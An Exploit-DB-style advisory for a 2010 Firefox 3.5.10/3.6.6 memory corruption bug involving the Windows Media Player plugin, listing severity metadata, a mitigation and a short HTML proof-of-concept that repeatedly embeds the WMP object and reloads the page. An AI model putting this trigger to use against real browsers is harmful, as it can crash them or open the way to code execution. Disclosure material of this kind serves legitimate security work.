Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups

vendor:

Firefox

by:

berendjanwever

7,5

CVSS

HIGH

Memory Corruption

119

CWE

Product Name: Firefox

Affected Version From: 3.5.10

Affected Version To: 3.6.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp3

2010

Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups

This exploit uses a malicious HTML page to cause a memory corruption in Firefox 3.5.10 and 3.6.6 when used with Windows Media Player 10 or 11. The malicious HTML page contains a script that creates an embedded Windows Media Player object and reloads the page until the object is created. This causes a memory corruption in Firefox, which can be used to execute arbitrary code.

Mitigation:

Update Firefox to the latest version to prevent this exploit from being successful.

Source

Exploit-DB raw data:

Source: http://code.google.com/p/skylined/issues/detail?id=21

# Exploit Title: Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups
# Date: 2010-10-13
# Author: berendjanwever
# Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11
# Tested on: Windows XP sp3

<HTML>
  <HEAD>
    <SCRIPT>
      function go() {
        var oWMP = document.getElementById("WMP");
        if (oWMP) {
          location.reload();
        } else {
          var oWrapper = document.getElementById("wrapper");
          oWrapper.innerHTML = '<EMBED id="WMP" type="application/x-mplayer2" autostart=1 src="repro-firefox.html"></EMBED>';
          setTimeout(go, 1000);
        }
      }
    </SCRIPT>
  </HEAD>
  <BODY onload="go()">
    <SPAN id="wrapper"></SPAN>
  </BODY>
</HTML>